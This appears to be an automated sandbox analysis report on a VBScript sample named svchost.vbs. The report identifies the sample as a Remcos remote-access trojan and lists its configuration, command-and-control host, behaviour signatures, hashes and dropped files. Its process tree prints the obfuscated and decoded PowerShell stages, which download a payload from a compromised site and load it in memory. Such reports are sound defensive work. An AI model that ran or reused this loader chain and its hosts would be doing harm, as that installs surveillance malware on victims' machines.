Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-10-2024 08:03

General

  • Target

    svchost.vbs

  • Size

    1.6MB

  • MD5

    dd777abe140a21d03c52d83f0972ea03

  • SHA1

    7135fada7f4e9562a80f9b3755f2e4e8df808619

  • SHA256

    3fc452863dc66976a6d40d91b9706053f1afa362e9c6f43d04fe4a4b526c148d

  • SHA512

    658f7218b40a0dc7fbaf8781f370e3f9201305958347ef56b989d92859eddd6b1e44f1f2efc26c64c70d4b5d9585c510b225810611b71c4abab57fab68bcac9e

  • SSDEEP

    3072:BiiiiiiiiiiiiiiiiiiiiUiiiiiiiiiiiiiiiiiiiihiiiiiiiiiiiiiiiiiiiic:f

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.alinstantecolombia.com/wp-content/uploads/2024/09/dllsky.txt

Extracted

Family

remcos

Botnet

Nlk

C2

comandoespecial2023.duckdns.org:8888

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-3PWW8O

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3260
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J▒Bq▒G4▒YQBu▒Hg▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒G8▒YwBo▒Gg▒ZQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒HY▒YQBk▒GE▒aw▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwB3▒Hc▒dw▒u▒GE▒b▒Bp▒G4▒cwB0▒GE▒bgB0▒GU▒YwBv▒Gw▒bwBt▒GI▒aQBh▒C4▒YwBv▒G0▒LwB3▒H▒▒LQBj▒G8▒bgB0▒GU▒bgB0▒C8▒dQBw▒Gw▒bwBh▒GQ▒cw▒v▒DI▒M▒▒y▒DQ▒Lw▒w▒Dk▒LwBk▒Gw▒b▒Bz▒Gs▒eQ▒u▒HQ▒e▒B0▒Cc▒KQ▒p▒Ds▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EE▒c▒Bw▒EQ▒bwBt▒GE▒aQBu▒F0▒Og▒6▒EM▒dQBy▒HI▒ZQBu▒HQ▒R▒Bv▒G0▒YQBp▒G4▒LgBM▒G8▒YQBk▒Cg▒J▒B2▒GE▒Z▒Bh▒Gs▒KQ▒u▒Ec▒ZQB0▒FQ▒eQBw▒GU▒K▒▒n▒EM▒b▒Bh▒HM▒cwBM▒Gk▒YgBy▒GE▒cgB5▒DE▒LgBD▒Gw▒YQBz▒HM▒MQ▒n▒Ck▒LgBH▒GU▒d▒BN▒GU▒d▒Bo▒G8▒Z▒▒o▒Cc▒WgB4▒Es▒S▒BH▒Cc▒KQ▒u▒Ek▒bgB2▒G8▒awBl▒Cg▒J▒Bu▒HU▒b▒Bs▒Cw▒I▒Bb▒G8▒YgBq▒GU▒YwB0▒Fs▒XQBd▒C▒▒K▒▒n▒HQ▒e▒B0▒C4▒bwBq▒GU▒aQB2▒HM▒bwBj▒G0▒ZQBy▒C8▒OQ▒w▒C8▒N▒▒y▒D▒▒Mg▒v▒HM▒Z▒Bh▒G8▒b▒Bw▒HU▒LwB0▒G4▒ZQB0▒G4▒bwBj▒C0▒c▒B3▒C8▒bQBv▒GM▒LgBh▒Gk▒YgBt▒G8▒b▒Bv▒GM▒ZQB0▒G4▒YQB0▒HM▒bgBp▒Gw▒YQ▒u▒Hc▒dwB3▒C8▒Lw▒6▒HM▒c▒B0▒HQ▒a▒▒n▒C▒▒L▒▒g▒CQ▒bwBj▒Gg▒a▒Bl▒C▒▒L▒▒g▒Cc▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bq▒G4▒YQBu▒Hg▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\svchost.vbs');powershell $KByHL;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2572
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jnanx = '0';$ochhe = 'C:\Users\Admin\AppData\Local\Temp\svchost.vbs';[Byte[]] $vadak = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.alinstantecolombia.com/wp-content/uploads/2024/09/dllsky.txt'));[system.AppDomain]::CurrentDomain.Load($vadak).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.ojeivsocmer/90/4202/sdaolpu/tnetnoc-pw/moc.aibmolocetnatsnila.www//:sptth' , $ochhe , '_______________________-------------', $jnanx, '1', 'Roda' ));"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3996
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:184

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat

    Filesize

    144B

    MD5

    e7c61b14531be65f4b660225bd7b6a44

    SHA1

    cbcf8c19e875550fbaa1966160324fe29087791c

    SHA256

    cd89a8b7660d474026ca518359463353250e0f7a4ba0c16fee1244b7119ad0df

    SHA512

    b666ac1d58b916ff3764936df65104f9a16b5beac971541ae96242d723f10fc9ee9bd5326cd22fd00355e76e8acc1724689497bb6cb68e4281c2b9223992832c

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    f41839a3fe2888c8b3050197bc9a0a05

    SHA1

    0798941aaf7a53a11ea9ed589752890aee069729

    SHA256

    224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

    SHA512

    2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    5caad758326454b5788ec35315c4c304

    SHA1

    3aef8dba8042662a7fcf97e51047dc636b4d4724

    SHA256

    83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

    SHA512

    4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p3e1vo1f.y0r.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/184-38-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/184-49-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/184-73-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/184-24-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/184-27-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/184-74-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/184-66-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/184-31-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/184-35-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/184-65-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/184-58-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/184-39-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/184-40-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/184-41-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/184-43-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/184-57-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/184-50-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2572-1-0x000002569CAA0000-0x000002569CAC2000-memory.dmp

    Filesize

    136KB

  • memory/2572-0-0x00007FFC0B253000-0x00007FFC0B255000-memory.dmp

    Filesize

    8KB

  • memory/2572-34-0x00007FFC0B250000-0x00007FFC0BD11000-memory.dmp

    Filesize

    10.8MB

  • memory/2572-11-0x00007FFC0B250000-0x00007FFC0BD11000-memory.dmp

    Filesize

    10.8MB

  • memory/2572-12-0x00007FFC0B250000-0x00007FFC0BD11000-memory.dmp

    Filesize

    10.8MB

  • memory/3996-22-0x0000021E58B40000-0x0000021E58B48000-memory.dmp

    Filesize

    32KB

  • memory/3996-23-0x0000021E59980000-0x0000021E5998A000-memory.dmp

    Filesize

    40KB